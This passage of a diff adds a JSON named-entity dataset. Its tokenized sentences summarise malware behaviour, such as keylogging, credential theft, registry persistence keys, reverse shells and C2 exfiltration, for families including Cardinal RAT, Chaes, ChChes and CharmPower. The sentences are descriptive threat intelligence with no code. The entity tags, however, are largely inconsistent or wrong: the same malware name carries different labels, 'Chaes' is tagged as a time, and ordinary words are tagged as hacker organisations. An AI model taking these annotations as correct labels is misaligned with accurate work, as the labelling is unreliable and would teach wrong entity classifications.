[ + "I-SamFile", + "B-SecTeam", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Cardinal", + "RAT", + "can", + "uninstall", + "itself,", + "including", + "deleting", + "its", + "executable." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "B-Way", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "Cardinal", + "RAT", + "checks", + "its", + "current", + "working", + "directory", + "upon", + "execution", + "and", + "also", + "contains", + "watchdog", + "functionality", + "that", + "ensures", + "its", + "executable", + "is", + "located", + "in", + "the", + "correct", + "path", + "(else", + "it", + "will", + "rewrite", + "the", + "payload)." + ], + "ner_tags": [ + "I-SamFile", + "B-SecTeam", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Cardinal", + "RAT", + "can", + "download", + "and", + "execute", + "additional", + "payloads." + ], + "ner_tags": [ + "I-SamFile", + "B-SecTeam", + "O", + "B-Features", + "O", + "I-Features", + "I-Features", + "B-HackOrg" + ] + }, + { + "tokens": [ + "Cardinal", + "RAT", + "can", + "log", + "keystrokes." + ], + "ner_tags": [ + "I-SamFile", + "B-SecTeam", + "O", + "I-Features", + "B-HackOrg" + ] + }, + { + "tokens": [ + "Cardinal", + "RAT", + "lures", + "victims", + "into", + "executing", + "malicious", + "macros", + "embedded", + "within", + "Microsoft", + "Excel", + "documents." + ], + "ner_tags": [ + "I-HackOrg", + "B-SecTeam", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Way", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Cardinal", + "RAT", + "sets", + "<code>HKCU\\Software\\Microsoft\\Windows", + "NT\\CurrentVersion\\Windows\\Load</code>", + "to", + "point", + "to", + "its", + "executable." + ], + "ner_tags": [ + "I-SamFile", + "B-SecTeam", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Cardinal", + "RAT", + "contains", + "watchdog", + "functionality", + "that", + "ensures", + "its", + "process", + "is", + "always", + "running,", + "else", + "spawns", + "a", + "new", + "instance." + ], + "ner_tags": [ + "I-SamFile", + "B-SecTeam", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Cardinal", + "RAT", + "injects", + "into", + "a", + "newly", + "spawned", + "process", + "created", + "from", + "a", + "native", + "Windows", + "executable." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Cardinal", + "RAT", + "can", + "act", + "as", + "a", + "reverse", + "proxy." + ], + "ner_tags": [ + "B-SamFile", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Cardinal", + "RAT", + "contains", + "watchdog", + "functionality", + "that", + "periodically", + "ensures", + "<code>HKCU\\Software\\Microsoft\\Windows", + "NT\\CurrentVersion\\Windows\\Load</code>", + "is", + "set", + "to", + "point", + "to", + "its", + "executable." + ], + "ner_tags": [ + "I-SamFile", + "B-SecTeam", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Cardinal", + "RAT", + "establishes", + "Persistence", + "by", + "setting", + "the", + "<code>HKCU\\Software\\Microsoft\\Windows", + "NT\\CurrentVersion\\Windows\\Load</code>", + "Registry", + "key", + "to", + "point", + "to", + "its", + "executable." + ], + "ner_tags": [ + "I-SecTeam", + "I-SecTeam", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Cardinal", + "RAT", + "can", + "capture", + "screenshots." + ], + "ner_tags": [ + "I-SamFile", + "B-SecTeam", + "O", + "I-Features", + "B-HackOrg" + ] + }, + { + "tokens": [ + "Cardinal", + "RAT", + "uses", + "a", + "secret", + "key", + "with", + "a", + "series", + "of", + "XOR", + "and", + "addition", + "operations", + "to", + "encrypt", + "C2", + "traffic." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "B-HackOrg", + "B-Features" + ] + }, + { + "tokens": [ + "Cardinal", + "RAT", + "can", + "collect", + "the", + "hostname,", + "Microsoft", + "Windows", + "version,", + "and", + "processor", + "architecture", + "from", + "a", + "victim", + "machine." + ], + "ner_tags": [ + "I-SamFile", + "B-SecTeam", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Cardinal", + "RAT", + "can", + "collect", + "the", + "username", + "from", + "a", + "victim", + "machine." + ], + "ner_tags": [ + "I-SamFile", + "B-SecTeam", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Cardinal", + "RAT", + "is", + "downloaded", + "using", + "HTTP", + "over", + "port", + "443." + ], + "ner_tags": [ + "I-SamFile", + "B-SecTeam", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Cardinal", + "RAT", + "can", + "execute", + "commands." + ], + "ner_tags": [ + "I-SamFile", + "B-SecTeam", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Catchamas", + "obtains", + "application", + "windows", + "titles", + "and", + "then", + "determines", + "which", + "windows", + "to", + "perform", + "Screen", + "Capture", + "on." + ], + "ner_tags": [ + "B-SamFile", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Catchamas", + "steals", + "data", + "stored", + "in", + "the", + "clipboard." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Catchamas", + "collects", + "keystrokes", + "from", + "the", + "victim’s", + "machine." + ], + "ner_tags": [ + "B-SamFile", + "I-Features", + "B-HackOrg", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Catchamas", + "stores", + "the", + "gathered", + "data", + "from", + "the", + "machine", + "in", + ".db", + "files", + "and", + ".bmp", + "files", + "under", + "four", + "separate", + "locations." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "B-SamFile", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Catchamas", + "adds", + "a", + "new", + "service", + "named", + "NetAdapter", + "in", + "an", + "apparent", + "attempt", + "to", + "masquerade", + "as", + "a", + "legitimate", + "service." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Catchamas", + "creates", + "three", + "Registry", + "keys", + "to", + "establish", + "persistence", + "by", + "adding", + "a", + "Windows", + "Service." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "I-Tool", + "O" + ] + }, + { + "tokens": [ + "Catchamas", + "captures", + "screenshots", + "based", + "on", + "specific", + "keywords", + "in", + "the", + "window’s", + "title." + ], + "ner_tags": [ + "B-SamFile", + "I-Features", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Catchamas", + "gathers", + "the", + "Mac", + "address,", + "IP", + "address,", + "and", + "the", + "network", + "adapter", + "information", + "from", + "the", + "victim’s", + "machine." + ], + "ner_tags": [ + "B-SamFile", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Catchamas", + "adds", + "a", + "new", + "service", + "named", + "NetAdapter", + "to", + "establish", + "persistence." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Caterpillar", + "WebShell", + "has", + "a", + "module", + "to", + "perform", + "brute", + "force", + "attacks", + "on", + "a", + "system." + ], + "ner_tags": [ + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "B-Org", + "I-OffAct", + "I-OffAct", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Caterpillar", + "WebShell", + "has", + "a", + "module", + "to", + "collect", + "information", + "from", + "the", + "local", + "database." + ], + "ner_tags": [ + "B-SamFile", + "B-SecTeam", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Caterpillar", + "WebShell", + "can", + "upload", + "files", + "over", + "the", + "C2", + "channel." + ], + "ner_tags": [ + "B-SamFile", + "B-SecTeam", + "O", + "B-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Caterpillar", + "WebShell", + "can", + "search", + "for", + "files", + "in", + "directories." + ], + "ner_tags": [ + "B-SamFile", + "B-SecTeam", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "O" + ] + }, + { + "tokens": [ + "Caterpillar", + "WebShell", + "has", + "a", + "module", + "to", + "download", + "and", + "upload", + "files", + "to", + "the", + "system." + ], + "ner_tags": [ + "B-SamFile", + "B-SecTeam", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "B-Features", + "I-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Caterpillar", + "WebShell", + "can", + "obtain", + "a", + "list", + "of", + "local", + "groups", + "of", + "users", + "from", + "a", + "system." + ], + "ner_tags": [ + "B-SamFile", + "B-SecTeam", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Caterpillar", + "WebShell", + "has", + "a", + "command", + "to", + "modify", + "a", + "Registry", + "key." + ], + "ner_tags": [ + "B-Way", + "B-SecTeam", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Caterpillar", + "WebShell", + "has", + "a", + "module", + "to", + "use", + "a", + "port", + "scanner", + "on", + "a", + "system." + ], + "ner_tags": [ + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Tool", + "B-Tool", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Caterpillar", + "WebShell", + "can", + "gather", + "a", + "list", + "of", + "processes", + "running", + "on", + "the", + "machine." + ], + "ner_tags": [ + "B-SamFile", + "B-SecTeam", + "O", + "I-Features", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Caterpillar", + "WebShell", + "has", + "a", + "module", + "to", + "use", + "a", + "rootkit", + "on", + "a", + "system." + ], + "ner_tags": [ + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Caterpillar", + "WebShell", + "has", + "a", + "module", + "to", + "gather", + "information", + "from", + "the", + "compromrised", + "asset,", + "including", + "the", + "computer", + "version,", + "computer", + "name,", + "IIS", + "version,", + "and", + "more." + ], + "ner_tags": [ + "B-Way", + "B-SecTeam", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Caterpillar", + "WebShell", + "can", + "gather", + "the", + "IP", + "address", + "from", + "the", + "victim's", + "machine", + "using", + "the", + "IP", + "config", + "command." + ], + "ner_tags": [ + "B-Way", + "B-SecTeam", + "O", + "I-Features", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Caterpillar", + "WebShell", + "can", + "obtain", + "a", + "list", + "of", + "user", + "accounts", + "from", + "a", + "victim's", + "machine." + ], + "ner_tags": [ + "B-SamFile", + "B-SecTeam", + "O", + "I-Features", + "I-Features", + "I-Features", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Caterpillar", + "WebShell", + "can", + "obtain", + "a", + "list", + "of", + "the", + "services", + "from", + "a", + "system." + ], + "ner_tags": [ + "B-SamFile", + "B-SecTeam", + "O", + "I-Features", + "I-Features", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Caterpillar", + "WebShell", + "can", + "run", + "commands", + "on", + "the", + "compromised", + "asset", + "with", + "CMD", + "functions." + ], + "ner_tags": [ + "B-SamFile", + "B-SecTeam", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ChChes", + "samples", + "were", + "digitally", + "signed", + "with", + "a", + "certificate", + "originally", + "used", + "by", + "Hacking", + "Team", + "that", + "was", + "later", + "leaked", + "and", + "subsequently", + "revoked." + ], + "ner_tags": [ + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ChChes", + "steals", + "credentials", + "stored", + "inside", + "Internet", + "Explorer." + ], + "ner_tags": [ + "B-Way", + "I-Purp", + "I-Purp", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ChChes", + "can", + "alter", + "the", + "victim's", + "proxy", + "configuration." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ChChes", + "collects", + "the", + "victim's", + "%TEMP%", + "directory", + "path", + "and", + "version", + "of", + "Internet", + "Explorer." + ], + "ner_tags": [ + "B-Way", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ChChes", + "is", + "capable", + "of", + "downloading", + "files,", + "including", + "additional", + "modules." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ChChes", + "copies", + "itself", + "to", + "an", + ".exe", + "file", + "with", + "a", + "filename", + "that", + "is", + "likely", + "intended", + "to", + "imitate", + "Norton", + "Antivirus", + "but", + "has", + "several", + "letters", + "reversed", + "(e.g.", + "notron.exe)." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "B-SamFile", + "I-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "ChChes", + "collects", + "its", + "process", + "identifier", + "(PID)", + "on", + "the", + "victim." + ], + "ner_tags": [ + "B-Way", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ChChes", + "establishes", + "persistence", + "by", + "adding", + "a", + "Registry", + "Run", + "key." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ChChes", + "can", + "encode", + "C2", + "data", + "with", + "a", + "custom", + "technique", + "that", + "utilizes", + "Base64." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "ChChes", + "can", + "encrypt", + "C2", + "traffic", + "with", + "AES", + "or", + "RC4." + ], + "ner_tags": [ + "B-Way", + "O", + "B-Features", + "B-HackOrg", + "B-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ChChes", + "collects", + "the", + "victim", + "hostname,", + "window", + "resolution,", + "and", + "Microsoft", + "Windows", + "version." + ], + "ner_tags": [ + "B-SamFile", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ChChes", + "communicates", + "to", + "its", + "C2", + "server", + "over", + "HTTP", + "and", + "embeds", + "data", + "within", + "the", + "Cookie", + "HTTP", + "header." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "B-Features", + "O", + "O", + "O", + "B-Tool", + "B-Tool", + "O" + ] + }, + { + "tokens": [ + "Chaes", + "has", + "used", + "the", + "Puppeteer", + "module", + "to", + "hook", + "and", + "monitor", + "the", + "Chrome", + "web", + "browser", + "to", + "collect", + "user", + "information", + "from", + "infected", + "hosts." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Chaes", + "can", + "steal", + "login", + "credentials", + "and", + "stored", + "financial", + "information", + "from", + "the", + "browser." + ], + "ner_tags": [ + "B-Idus", + "O", + "I-Purp", + "B-SamFile", + "B-Purp", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Chaes", + "has", + "used", + "search", + "order", + "hijacking", + "to", + "load", + "a", + "malicious", + "DLL." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "I-Way", + "I-Way", + "O", + "O", + "O", + "O", + "B-Way", + "B-Way" + ] + }, + { + "tokens": [ + "Chaes", + "has", + "decrypted", + "an", + "AES", + "encrypted", + "binary", + "file", + "to", + "trigger", + "the", + "download", + "of", + "other", + "files." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Chaes", + "has", + "used", + "encryption", + "for", + "its", + "C2", + "channel." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Chaes", + "has", + "exfiltrated", + "its", + "collected", + "data", + "from", + "the", + "infected", + "machine", + "to", + "the", + "C2,", + "sometimes", + "using", + "the", + "MIME", + "protocol." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "Some", + "versions", + "of", + "Chaes", + "stored", + "its", + "instructions", + "(otherwise", + "in", + "a", + "`instructions.ini`", + "file)", + "in", + "the", + "Registry." + ], + "ner_tags": [ + "O", + "O", + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Chaes", + "can", + "download", + "additional", + "files", + "onto", + "an", + "infected", + "machine." + ], + "ner_tags": [ + "B-Idus", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Chaes", + "has", + "a", + "module", + "to", + "perform", + "any", + "API", + "hooking", + "it", + "desires." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Chaes", + "has", + "used", + "Installutill", + "to", + "download", + "content." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Chaes", + "has", + "used", + "JavaScript", + "and", + "Node.Js", + "information", + "stealer", + "script", + "that", + "exfiltrates", + "data", + "using", + "the", + "node", + "process." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "B-Way", + "O", + "B-Way", + "O", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Chaes", + "requires", + "the", + "user", + "to", + "click", + "on", + "the", + "malicious", + "Word", + "document", + "to", + "execute", + "the", + "next", + "part", + "of", + "the", + "attack." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "I-SamFile", + "I-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Chaes", + "has", + "used", + "an", + "unsigned,", + "crafted", + "DLL", + "module", + "named", + "<code>hha.dll</code>", + "that", + "was", + "designed", + "to", + "look", + "like", + "a", + "legitimate", + "32-bit", + "Windows", + "DLL." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "B-SecTeam" + ] + }, + { + "tokens": [ + "Chaes", + "can", + "modify", + "Registry", + "values", + "to", + "stored", + "information", + "and", + "establish", + "persistence." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Chaes", + "has", + "used", + ".MSI", + "files", + "as", + "an", + "initial", + "way", + "to", + "start", + "the", + "infection", + "chain." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "B-SamFile", + "I-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Chaes", + "used", + "the", + "<code>CreateFileW()</code>", + "API", + "function", + "with", + "read", + "permissions", + "to", + "access", + "downloaded", + "payloads." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Chaes", + "has", + "used", + "Python", + "scripts", + "for", + "execution", + "and", + "the", + "installation", + "of", + "additional", + "files." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "Chaes", + "has", + "added", + "persistence", + "via", + "the", + "Registry", + "key", + "<code>software\\microsoft\\windows\\currentversion\\run\\microsoft", + "windows", + "html", + "help</code>." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Chaes", + "can", + "capture", + "screenshots", + "of", + "the", + "infected", + "machine." + ], + "ner_tags": [ + "B-Time", + "O", + "I-Features", + "B-HackOrg", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Chaes", + "has", + "been", + "delivered", + "by", + "sending", + "victims", + "a", + "phishing", + "email", + "containing", + "a", + "malicious", + ".docx", + "file." + ], + "ner_tags": [ + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "I-Way", + "O", + "O", + "B-SamFile", + "B-SamFile", + "O" + ] + }, + { + "tokens": [ + "Chaes", + "has", + "used", + "Base64", + "to", + "encode", + "C2", + "communications." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Chaes", + "has", + "used", + "a", + "script", + "that", + "extracts", + "the", + "web", + "session", + "cookie", + "and", + "sends", + "it", + "to", + "the", + "C2", + "server." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Chaes", + "has", + "collected", + "system", + "information,", + "including", + "the", + "machine", + "name", + "and", + "OS", + "version." + ], + "ner_tags": [ + "B-Time", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Chaes", + "has", + "collected", + "the", + "username", + "and", + "UID", + "from", + "the", + "infected", + "machine." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Chaes", + "changed", + "the", + "template", + "target", + "of", + "the", + "settings.xml", + "file", + "embedded", + "in", + "the", + "Word", + "document", + "and", + "populated", + "that", + "field", + "with", + "the", + "downloaded", + "URL", + "of", + "the", + "next", + "payload." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "I-SamFile", + "O", + "O", + "O", + "B-Tool", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Chaes", + "has", + "used", + "VBscript", + "to", + "execute", + "malicious", + "code." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Chaes", + "has", + "used", + "HTTP", + "for", + "C2", + "communications." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Chaes", + "has", + "used", + "cmd", + "to", + "execute", + "tasks", + "on", + "the", + "system." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Chaos", + "conducts", + "brute", + "force", + "attacks", + "against", + "SSH", + "services", + "to", + "gain", + "initial", + "access." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "B-Org", + "I-OffAct", + "I-OffAct", + "O", + "O", + "O", + "O", + "I-Purp", + "I-Purp", + "O" + ] + }, + { + "tokens": [ + "After", + "initial", + "compromise,", + "Chaos", + "will", + "download", + "a", + "second", + "stage", + "to", + "establish", + "a", + "more", + "permanent", + "presence", + "on", + "the", + "affected", + "system." + ], + "ner_tags": [ + "O", + "O", + "O", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Chaos", + "provides", + "a", + "reverse", + "shell", + "connection", + "on", + "8338/TCP,", + "encrypted", + "via", + "AES." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Chaos", + "provides", + "a", + "reverse", + "shell", + "is", + "triggered", + "upon", + "receipt", + "of", + "a", + "packet", + "with", + "a", + "special", + "string,", + "sent", + "to", + "any", + "port." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Chaos", + "provides", + "a", + "reverse", + "shell", + "connection", + "on", + "8338/TCP,", + "encrypted", + "via", + "AES." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "CharmPower", + "can", + "collect", + "data", + "and", + "files", + "from", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "CharmPower", + "can", + "retrieve", + "C2", + "domain", + "information", + "from", + "actor-controlled", + "S3", + "buckets." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "CharmPower", + "can", + "decrypt", + "downloaded", + "modules", + "prior", + "to", + "execution." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "CharmPower", + "can", + "exfiltrate", + "gathered", + "data", + "to", + "a", + "hardcoded", + "C2", + "URL", + "via", + "HTTP", + "POST." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "CharmPower", + "can", + "send", + "victim", + "data", + "via", + "FTP", + "with", + "credentials", + "hardcoded", + "in", + "the", + "script." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "CharmPower", + "can", + "change", + "its", + "C2", + "channel", + "once", + "every", + "360", + "loops", + "by", + "retrieving", + "a", + "new", + "domain", + "from", + "the", + "actors’", + "S3", + "bucket." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "CharmPower", + "can", + "delete", + "created", + "files", + "from", + "a", + "compromised", + "system." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "CharmPower", + "can", + "enumerate", + "drives", + "and", + "list", + "the", + "contents", + "of", + "the", + "C:", + "drive", + "on", + "a", + "victim's", + "computer." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "CharmPower", + "has", + "the", + "ability", + "to", + "download", + "additional", + "modules", + "to", + 